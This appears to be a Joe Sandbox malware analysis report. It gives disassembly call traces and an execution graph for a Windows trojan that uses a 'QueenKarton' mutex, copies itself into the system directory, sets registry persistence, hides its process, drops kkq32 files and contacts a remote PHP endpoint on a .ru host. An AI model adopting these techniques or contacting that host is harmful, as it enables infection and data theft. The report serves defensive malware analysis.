                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2707 403840 printf 2708 403880 2707->2708 2709 403884 printf 2708->2709 2710 40386d printf 2708->2710 2710->2708 2716 4052e0 2717 4052ec strcat strcat 2716->2717 2733 40431f 2717->2733 2720 405360 2721 40537c CreateProcessA 2720->2721 2722 405469 2721->2722 2723 4053ac CloseHandle sprintf 2721->2723 2724 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2722->2724 2725 405413 2723->2725 2726 4054d0 2724->2726 2727 4053e5 FindWindowA 2725->2727 2728 40541d 2725->2728 2727->2728 2729 405402 Sleep 2727->2729 2728->2722 2730 405421 Sleep 2728->2730 2729->2725 2731 405434 Sleep 2730->2731 2732 40543e GetWindowTextA 2730->2732 2731->2732 2732->2722 2734 404341 GetCurrentThreadId GetThreadDesktop 2733->2734 2735 404364 CreateDesktopA 2733->2735 2736 40438e SetThreadDesktop 2734->2736 2737 40435f memset 2734->2737 2735->2736 2735->2737 2736->2737 2737->2720 2737->2721 2840 401581 2841 4015c8 2840->2841 2842 4015a2 rand 2841->2842 2843 4015cc 2841->2843 2842->2841 2738 403562 GetModuleFileNameA 2739 403588 2738->2739 3000 402ba3 3002 402a89 3000->3002 3001 402cd2 3002->3001 3003 402cad GetCurrentProcessId 3002->3003 3004 402b2a GetModuleHandleA GetProcAddress 3002->3004 3003->3002 3004->3002 2740 4077e4 2741 407808 2740->2741 2748 40789e 2740->2748 2742 407820 SetFocus 2741->2742 2743 40782b 2741->2743 2741->2748 2742->2743 2744 407833 SetFocus 2743->2744 2745 40783e 2743->2745 2744->2745 2746 407857 2745->2746 2747 40784c SetFocus 2745->2747 2749 40786a 2746->2749 2750 40785f SetFocus 2746->2750 2747->2746 2753 407910 2748->2753 2754 4078fe CallWindowProcA 2748->2754 2751 407872 SetFocus 2749->2751 2752 40787d 2749->2752 2750->2749 2751->2752 2752->2748 2755 407885 SetFocus 2752->2755 2754->2753 2755->2748 2844 405c09 lstrlenA GetTickCount srand 2877 40509b 2844->2877 2849 405f54 2850 405caf ExpandEnvironmentStringsA 2891 40570c 2850->2891 2853 405ceb strcat strcat 2854 40431f 4 API calls 2853->2854 2855 405d14 memset 2854->2855 2856 405d72 CreateProcessA 2855->2856 2857 405d56 2855->2857 2858 405da2 CloseHandle sprintf 2856->2858 2859 405f24 DeleteFileA TerminateProcess CloseHandle 2856->2859 2857->2856 2860 405e09 2858->2860 2859->2849 2861 405e13 2860->2861 2862 405ddb FindWindowA 2860->2862 2861->2859 2864 405e1b Sleep GetWindowTextA 2861->2864 2862->2861 2863 405df8 Sleep 2862->2863 2863->2860 2865 405e50 2864->2865 2865->2859 2930 405613 2865->2930 2867 405e6b 2867->2859 2868 405e76 CopyFileA 2867->2868 2869 403619 5 API calls 2868->2869 2870 405e9c DeleteFileA lstrlenA strncmp 2869->2870 2871 405ec6 lstrlenA 2870->2871 2872 405eef 2870->2872 2938 403743 CreateFileA 2871->2938 2874 403743 4 API calls 2872->2874 2875 405eea LocalFree 2874->2875 2875->2859 2878 4050ea 2877->2878 2879 4050b6 sprintf 2878->2879 2880 4050f8 2878->2880 2941 4041f4 2879->2941 2882 4041f4 4 API calls 2880->2882 2883 40510e 2882->2883 2944 4041c3 lstrlenA 2883->2944 2886 40429c RegOpenKeyExA 2887 4042e0 RegQueryValueExA 2886->2887 2890 4042dc 2886->2890 2888 404304 RegCloseKey 2887->2888 2889 4042f8 RegCloseKey 2887->2889 2888->2890 2889->2890 2890->2849 2890->2850 2892 4079e4 2891->2892 2893 405719 GetTempPathA 2892->2893 2894 405746 2893->2894 2894->2894 2952 4015ea 2894->2952 2897 405798 strcat 2898 4057ac rand 2897->2898 2899 4057e7 rand 2898->2899 2900 4057be rand sprintf 2898->2900 2901 4057f9 strcat 2899->2901 2902 40580d strcat rand 2899->2902 2900->2899 2901->2902 2903 405839 strcat 2902->2903 2904 40584d rand 2902->2904 2903->2904 2905 405888 sprintf rand 2904->2905 2906 40585f rand sprintf 2904->2906 2907 4058c3 strcat 2905->2907 2908 4058d7 strcat rand 2905->2908 2906->2905 2907->2908 2909 405911 strcat rand 2908->2909 2910 4058fd strcat 2908->2910 2911 405966 strcat rand 2909->2911 2912 40593d rand sprintf 2909->2912 2910->2909 2913 4059a0 strcat rand 2911->2913 2914 40598c strcat 2911->2914 2912->2911 2915 4059d2 strcat 2913->2915 2916 4059e6 strcat rand 2913->2916 2914->2913 2915->2916 2917 405a20 sprintf rand 2916->2917 2918 405a0c strcat 2916->2918 2919 405a70 strcat rand 2917->2919 2920 405a5c strcat 2917->2920 2918->2917 2921 405ab0 rand sprintf rand 2919->2921 2922 405a9c strcat 2919->2922 2920->2919 2923 405af3 strcat 2921->2923 2924 405b07 strcat rand 2921->2924 2922->2921 2923->2924 2925 405b39 strcat 2924->2925 2926 405b4d rand 2924->2926 2925->2926 2927 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2926->2927 2928 405b5f rand sprintf 2926->2928 2929 405c04 2927->2929 2928->2927 2929->2849 2929->2853 2931 4079e4 2930->2931 2932 405620 FindFirstUrlCacheEntryA 2931->2932 2933 405663 _stricmp 2932->2933 2934 405685 2932->2934 2933->2934 2935 4056a7 FindNextUrlCacheEntryA 2933->2935 2934->2867 2935->2934 2936 4056c9 _stricmp 2935->2936 2936->2934 2937 4056fb 2936->2937 2937->2935 2939 403775 2938->2939 2940 403779 SetFilePointer WriteFile CloseHandle 2938->2940 2939->2875 2940->2939 2947 40421f RegCreateKeyExA 2941->2947 2945 40421f 4 API calls 2944->2945 2946 4041ee InterlockedIncrement memset 2945->2946 2946->2886 2948 404262 RegSetValueExA 2947->2948 2949 404219 2947->2949 2950 404288 RegCloseKey 2948->2950 2951 40427c RegCloseKey 2948->2951 2949->2878 2950->2949 2951->2949 2953 401634 2952->2953 2954 401638 strcat sprintf rand 2953->2954 2955 40160e rand 2953->2955 2954->2897 2954->2898 2955->2953 3005 4037aa 3007 4037c8 printf printf 3005->3007 3008 40380d 3007->3008 3009 4037fa printf 3008->3009 3011 403812 printf 3008->3011 3009->3008 3012 4035ab 3013 4079e4 3012->3013 3014 4035b8 vsprintf 3013->3014 3017 4035f9 MessageBoxA 3014->3017 3016 4035ea 3017->3016 2756 40686c lstrlenA 2757 405f5b 9 API calls 2756->2757 2758 40689a 2757->2758 2759 4068a1 WinExec 2758->2759 2760 4068a9 2758->2760 2759->2760 2956 40328f 2957 402efd 2956->2957 2958 402cd7 3 API calls 2957->2958 2959 4033ce 2957->2959 2960 40289a 4 API calls 2957->2960 2961 4030e5 GetModuleHandleA 2957->2961 2962 40314c VirtualQuery 2957->2962 2964 402f98 GlobalMemoryStatus 2957->2964 2965 402f6f IsBadReadPtr 2957->2965 2966 403059 CloseHandle 2957->2966 2958->2957 2960->2957 2961->2957 2962->2957 2963 4031b1 IsBadWritePtr 2962->2963 2963->2957 2964->2957 2965->2957 2966->2957 2967 407892 2968 40789e 2967->2968 2969 407910 2968->2969 2970 4078fe CallWindowProcA 2968->2970 2970->2969 3018 405133 10 API calls 3019 40429c 4 API calls 3018->3019 3020 405264 3019->3020 3021 405278 3020->3021 3022 40526b LocalFree 3020->3022 3024 40509b 6 API calls 3021->3024 3023 4054d0 3022->3023 3025 40527d ExpandEnvironmentStringsA 3024->3025 3044 404532 3025->3044 3028 4052d3 LocalFree 3028->3023 3029 4052ec strcat strcat 3030 40431f 4 API calls 3029->3030 3031 405315 memset 3030->3031 3032 405360 3031->3032 3033 40537c CreateProcessA 3031->3033 3032->3033 3034 4053ac CloseHandle sprintf 3033->3034 3043 405469 3033->3043 3036 405413 3034->3036 3035 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3035->3023 3037 4053e5 FindWindowA 3036->3037 3038 40541d 3036->3038 3037->3038 3039 405402 Sleep 3037->3039 3040 405421 Sleep 3038->3040 3038->3043 3039->3036 3041 405434 Sleep 3040->3041 3042 40543e GetWindowTextA 3040->3042 3041->3042 3042->3043 3043->3035 3045 40453f 3044->3045 3046 403619 5 API calls 3045->3046 3047 404570 3046->3047 3048 404579 3047->3048 3049 404596 lstrlenA LocalAlloc GetTempPathA 3047->3049 3050 404589 LocalFree 3047->3050 3048->3028 3048->3029 3051 404604 3049->3051 3050->3048 3051->3051 3052 4015ea rand 3051->3052 3053 40461d strcat sprintf rand 3052->3053 3054 404655 strcat 3053->3054 3055 404668 rand 3053->3055 3054->3055 3056 40467a rand sprintf 3055->3056 3057 40469d rand 3055->3057 3056->3057 3058 4046bb strcat 3057->3058 3059 4046ce strcat rand 3057->3059 3058->3059 3060 4046f3 strcat 3059->3060 3061 404706 rand 3059->3061 3060->3061 3062 404741 sprintf rand 3061->3062 3063 40471e rand sprintf 3061->3063 3064 404770 strcat 3062->3064 3065 404783 strcat rand 3062->3065 3063->3062 3064->3065 3066 4047a8 strcat 3065->3066 3067 4047bb strcat rand 3065->3067 3066->3067 3068 4047e6 rand sprintf 3067->3068 3069 404809 rand sprintf sprintf rand 3067->3069 3068->3069 3070 404859 rand sprintf 3069->3070 3071 40487c rand 3069->3071 3070->3071 3072 404894 strcat 3071->3072 3073 4048a7 rand 3071->3073 3072->3073 3074 4048b9 strcat 3073->3074 3075 4048cc rand 3073->3075 3074->3075 3076 4048f1 sprintf rand 3075->3076 3077 4048de strcat 3075->3077 3078 404926 strcat 3076->3078 3079 404939 rand 3076->3079 3077->3076 3078->3079 3080 40494b strcat 3079->3080 3081 40495e rand 3079->3081 3080->3081 3082 404976 rand sprintf 3081->3082 3083 404999 3081->3083 3082->3083 3089 4049a3 3083->3089 3110 404b12 3083->3110 3084 404b07 3086 404c87 strcat rand 3084->3086 3085 4043bf 2 API calls 3085->3110 3087 404cac strcat 3086->3087 3088 404cbf rand 3086->3088 3087->3088 3092 404cd1 strcat 3088->3092 3093 404ce4 rand 3088->3093 3089->3084 3090 404a4b sprintf rand 3089->3090 3091 4049d9 sprintf 3089->3091 3094 404a82 strcat 3090->3094 3095 404a95 rand 3090->3095 3091->3089 3092->3093 3097 404cf6 strcat 3093->3097 3098 404d09 strcat rand 3093->3098 3094->3095 3099 404aa7 strcat 3095->3099 3100 404aba rand 3095->3100 3096 404b47 sprintf 3096->3110 3097->3098 3101 404d34 rand sprintf 3098->3101 3102 404d57 rand 3098->3102 3099->3100 3100->3089 3103 404acc strcat 3100->3103 3101->3102 3104 404d69 strcat 3102->3104 3105 404d7c rand 3102->3105 3103->3089 3104->3105 3106 404da1 rand 3105->3106 3107 404d8e strcat 3105->3107 3108 404db9 strcat 3106->3108 3109 404dcc rand 3106->3109 3107->3106 3108->3109 3111 404e01 strcat rand 3109->3111 3112 404dde rand sprintf 3109->3112 3110->3085 3110->3086 3110->3096 3137 40447a lstrlenA LocalAlloc 3110->3137 3114 404e2c strcat 3111->3114 3115 404e3f strcat rand 3111->3115 3112->3111 3114->3115 3117 404e64 strcat 3115->3117 3118 404e77 strcat rand 3115->3118 3117->3118 3121 404ea2 strcat 3118->3121 3122 404eb5 sprintf rand 3118->3122 3119 404c02 rand 3123 404c14 strcat 3119->3123 3124 404c27 rand 3119->3124 3120 404bef strcat 3120->3119 3121->3122 3127 404ee3 strcat 3122->3127 3128 404ef6 strcat rand 3122->3128 3123->3124 3125 404c39 strcat 3124->3125 3126 404c4c LocalFree 3124->3126 3125->3126 3126->3110 3127->3128 3129 404f27 strcat 3128->3129 3130 404f3a rand sprintf rand 3128->3130 3129->3130 3131 404f77 strcat 3130->3131 3132 404f8a strcat rand 3130->3132 3131->3132 3133 404fb5 strcat 3132->3133 3134 404fc8 rand 3132->3134 3133->3134 3135 404fda rand sprintf 3134->3135 3136 404ffd 7 API calls 3134->3136 3135->3136 3136->3048 3138 4044b6 3137->3138 3139 4044d9 sprintf 3138->3139 3140 40452a sprintf rand 3138->3140 3139->3138 3140->3119 3140->3120 3141 401b33 3144 401aa4 3141->3144 3142 401b13 3143 401ae6 sprintf 3146 40129c 3143->3146 3144->3142 3144->3143 3147 4012a9 CreateFileA 3146->3147 3148 4079e4 3146->3148 3149 4012db ReadFile CloseHandle 3147->3149 3150 4012d7 3147->3150 3148->3147 3149->3150 3150->3142 3151 4036b3 CreateFileA 3152 4036e3 3151->3152 3153 4036e7 SetFilePointer 3151->3153 3154 403701 3153->3154 3154->3154 3155 403708 WriteFile WriteFile CloseHandle 3154->3155 3155->3152 2761 406ff6 2762 4071a4 2761->2762 2763 40701f 2761->2763 2764 40717e 2762->2764 2765 4071be DestroyWindow 2762->2765 2766 407021 2763->2766 2767 40702f 2763->2767 2765->2764 2768 407184 2766->2768 2769 40702a 2766->2769 2770 407289 GetWindowTextA 2767->2770 2771 40703a 2767->2771 2768->2764 2772 407198 PostQuitMessage 2768->2772 2773 4077cc DefWindowProcA 2769->2773 2776 4072c9 GetWindowTextA 2770->2776 2777 4072a9 MessageBoxA SetFocus 2770->2777 2774 407041 2771->2774 2775 40705c 2771->2775 2772->2764 2773->2764 2774->2769 2774->2773 2781 4071cb 2774->2781 2780 407149 2775->2780 2817 405ffa 2775->2817 2778 407322 2776->2778 2779 407302 MessageBoxA SetFocus 2776->2779 2777->2764 2785 407337 MessageBoxA SetFocus 2778->2785 2794 407357 2778->2794 2779->2764 2780->2764 2824 406075 2780->2824 2781->2764 2787 407224 SetTextColor 2781->2787 2789 407233 SetTextColor 2781->2789 2785->2764 2786 405ffa 3 API calls 2788 40709b GetWindowRect 2786->2788 2790 40723d SetBkColor CreateBrushIndirect 2787->2790 2788->2780 2791 4070be GetWindowRect 2788->2791 2789->2790 2790->2764 2791->2780 2793 4070d4 2791->2793 2792 4073a7 sprintf GetWindowTextA 2796 40740f sprintf GetWindowTextA 2792->2796 2797 4073ef MessageBoxA SetFocus 2792->2797 2793->2780 2798 407112 MoveWindow 2793->2798 2794->2792 2795 407376 MessageBoxA SetFocus 2794->2795 2795->2764 2799 407477 sprintf GetWindowTextA 2796->2799 2800 407457 MessageBoxA SetFocus 2796->2800 2797->2764 2798->2780 2801 4074d9 2799->2801 2802 4074b9 MessageBoxA SetFocus 2799->2802 2800->2764 2803 4074ee MessageBoxA SetFocus 2801->2803 2805 40750e 2801->2805 2802->2764 2803->2764 2804 40755e sprintf GetWindowTextA 2807 4075a6 MessageBoxA SetFocus 2804->2807 2808 4075c6 2804->2808 2805->2804 2806 40752d MessageBoxA SetFocus 2805->2806 2806->2764 2807->2764 2809 407627 sprintf CreateFileA SetFilePointer 2808->2809 2810 4075e5 MessageBoxA SetFocus 2808->2810 2811 40768e 2809->2811 2810->2764 2811->2811 2812 407695 WriteFile WriteFile 2811->2812 2813 4076db 2812->2813 2813->2813 2814 4076e2 6 API calls 2813->2814 2815 40776e 2814->2815 2815->2815 2816 407775 WriteFile WriteFile CloseHandle ShowWindow 2815->2816 2816->2764 2818 4079e4 2817->2818 2819 406007 GetWindow 2818->2819 2821 406020 2819->2821 2820 406028 GetClassNameA 2820->2821 2821->2820 2822 406024 2821->2822 2823 40605f GetWindow 2821->2823 2822->2786 2823->2821 2825 405ffa 3 API calls 2824->2825 2826 406096 2825->2826 2827 405ffa 3 API calls 2826->2827 2828 4060a3 10 API calls 2827->2828 2829 406224 SendMessageA 2828->2829 2830 40623a SendMessageA 2828->2830 2831 40624e CreateWindowExA CreateWindowExA 2829->2831 2830->2831 2832 406333 2831->2832 2833 4062cb sprintf SendMessageA sprintf SendMessageA 2832->2833 2834 40633c 34 API calls 2832->2834 2833->2832 2834->2764 2971 401219 2972 40121f __GetMainArgs 2971->2972 2973 407980 173 API calls 2972->2973 2974 401284 exit 2973->2974 2975 40109a 2983 40109b 2975->2983 2976 40117f 2977 40118e signal 2976->2977 2978 4011a8 signal 2977->2978 2979 4011c9 2977->2979 2978->2979 2980 40117b 2978->2980 2979->2980 2981 4011ce signal raise 2979->2981 2981->2980 2983->2976 2983->2977 2983->2980 2984 40107a RtlUnwind 2983->2984 2984->2983 2835 40237b 2836 402333 _sleep 2835->2836 2837 402355 2835->2837 2838 401b9f 23 API calls 2836->2838 2839 40234c 2838->2839 2839->2836 2839->2837 2985 40109b 2986 40117f 2985->2986 2993 4010c3 2985->2993 2987 40118e signal 2986->2987 2988 4011a8 signal 2987->2988 2989 4011c9 2987->2989 2988->2989 2990 40117b 2988->2990 2989->2990 2991 4011ce signal raise 2989->2991 2991->2990 2993->2987 2993->2990 2994 40107a RtlUnwind 2993->2994 2994->2993 2995 40129b 2996 4079e4 2995->2996 2997 4012a9 CreateFileA 2996->2997 2998 4012db ReadFile CloseHandle 2997->2998 2999 4012d7 2997->2999 2998->2999 2711 40365e 2712 403664 GetFileSize LocalAlloc 2711->2712 2713 403684 ReadFile CloseHandle 2712->2713 2715 4036ae 2713->2715 2530 40121f __GetMainArgs 2533 407980 GetCommandLineA 2530->2533 2534 407991 strchr 2533->2534 2536 4079a6 2533->2536 2535 4079cf GetModuleHandleA 2534->2535 2534->2536 2539 406c29 OpenMutexA 2535->2539 2536->2535 2540 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2539->2540 2541 406c5f CloseHandle exit 2539->2541 2542 406cd6 2540->2542 2541->2540 2543 406ce4 rand 2542->2543 2544 406e07 9 API calls 2542->2544 2546 406d5f 2543->2546 2586 402e06 2544->2586 2548 406d69 rand 2546->2548 2549 406d2f rand 2546->2549 2552 406d8a sprintf CopyFileA 2548->2552 2553 406d7c 2548->2553 2549->2546 2550 406f65 2602 4023a7 CreateThread CloseHandle 2550->2602 2551 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2551->2550 2563 403ce9 rand 2552->2563 2553->2552 2557 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2559 406fdc GetMessageA 2557->2559 2654 4068b0 2557->2654 2672 40682b 2557->2672 2561 406fc4 TranslateMessage DispatchMessageA 2559->2561 2562 401284 exit 2559->2562 2561->2559 2564 403d27 2563->2564 2565 403d2e 2563->2565 2574 403f68 rand 2564->2574 2603 403619 CreateFileA 2565->2603 2568 403d47 memcpy memset 2570 403da1 rand rand rand rand memcpy 2568->2570 2571 403e64 2570->2571 2609 403bbe 2571->2609 2575 404002 2574->2575 2576 403fd4 rand 2575->2576 2577 404009 rand 2575->2577 2576->2575 2578 40402a 6 API calls 2577->2578 2579 40401c 2577->2579 2614 404148 RegCreateKeyExA 2578->2614 2579->2578 2581 4040f5 2582 404148 3 API calls 2581->2582 2583 404125 2582->2583 2584 404148 3 API calls 2583->2584 2585 40413a WinExec ExitProcess 2584->2585 2587 402e13 2586->2587 2617 402822 6 API calls 2587->2617 2589 402e1b GetVersion 2590 402e2e 2589->2590 2591 402e79 LoadLibraryA GetProcAddress 2590->2591 2601 402ef6 2590->2601 2591->2590 2592 4033ce GetVersion 2592->2550 2592->2551 2594 4030e5 GetModuleHandleA 2594->2601 2595 40314c VirtualQuery 2596 4031b1 IsBadWritePtr 2595->2596 2595->2601 2596->2601 2597 402f98 GlobalMemoryStatus 2597->2601 2598 402f6f IsBadReadPtr 2598->2601 2599 403059 CloseHandle 2599->2601 2601->2592 2601->2594 2601->2595 2601->2597 2601->2598 2601->2599 2618 40289a 2601->2618 2622 402cd7 2601->2622 2602->2557 2631 4022ee 2602->2631 2604 403664 GetFileSize LocalAlloc 2603->2604 2605 40364e 2603->2605 2606 403684 ReadFile CloseHandle 2604->2606 2605->2604 2608 4036ae 2605->2608 2606->2608 2608->2564 2608->2568 2611 403bfd 2609->2611 2610 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2610->2564 2611->2610 2612 403c20 rand 2611->2612 2613 403c80 memset memcpy memcpy 2611->2613 2612->2611 2613->2611 2615 404193 2614->2615 2615->2615 2616 40419a RegSetValueExA RegCloseKey 2615->2616 2616->2581 2617->2589 2619 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2618->2619 2621 4029cd 2619->2621 2621->2601 2623 402ceb 2622->2623 2625 402d13 2623->2625 2626 402a72 2623->2626 2625->2601 2629 402a89 2626->2629 2627 402cd2 2627->2625 2628 402b2a GetModuleHandleA GetProcAddress 2628->2629 2629->2627 2629->2628 2630 402cad GetCurrentProcessId 2629->2630 2630->2629 2632 402333 _sleep 2631->2632 2636 401b9f 2632->2636 2652 4079e4 2636->2652 2653 4079e5 2652->2653 2653->2653 2669 4068c7 2654->2669 2656 406c0c _sleep 2656->2669 2657 403619 5 API calls 2657->2669 2659 406c01 LocalFree 2659->2656 2660 406941 sscanf 2661 406972 rand 2660->2661 2660->2669 2661->2669 2662 406a84 atoi 2665 406aad sprintf 2662->2665 2662->2669 2663 4069a4 sprintf sprintf 2666 406a27 DeleteFileA sprintf WinExec 2663->2666 2664 4069db GetWindowsDirectoryA sprintf strcat 2664->2666 2665->2669 2666->2669 2667 406add lstrlenA 2667->2669 2668 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2668->2669 2669->2656 2669->2657 2669->2659 2669->2660 2669->2662 2669->2663 2669->2664 2669->2667 2669->2668 2670 406b9b lstrlenA 2669->2670 2671 406bbe CreateThread CloseHandle 2669->2671 2676 405f5b lstrlenA lstrlenA LocalAlloc 2669->2676 2681 4043bf 2669->2681 2670->2669 2671->2669 2673 40683b 2672->2673 2689 406753 CreateFileA 2673->2689 2687 407a04 2676->2687 2678 405f9b lstrlenA 2688 407a04 2678->2688 2680 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2680->2669 2682 4043dc 2681->2682 2683 40441a 2682->2683 2685 4043e2 memcpy 2682->2685 2684 404441 lstrlenA 2683->2684 2686 40442f 2683->2686 2684->2686 2685->2686 2686->2669 2687->2678 2688->2680 2690 40678f GetFileSize CloseHandle 2689->2690 2696 40681a _sleep 2689->2696 2697 4013cc RegOpenKeyExA 2690->2697 2696->2673 2698 4013fa 2697->2698 2699 4013fe RegQueryValueExA RegCloseKey 2697->2699 2698->2696 2700 4054d7 6 API calls 2698->2700 2699->2698 2701 405586 2700->2701 2702 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2701->2702 2703 40560e 2702->2703 2703->2696 2704 401348 RegCreateKeyExA 2703->2704 2705 40138a RegSetValueExA RegCloseKey 2704->2705 2706 401386 2704->2706 2705->2706 2706->2696

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
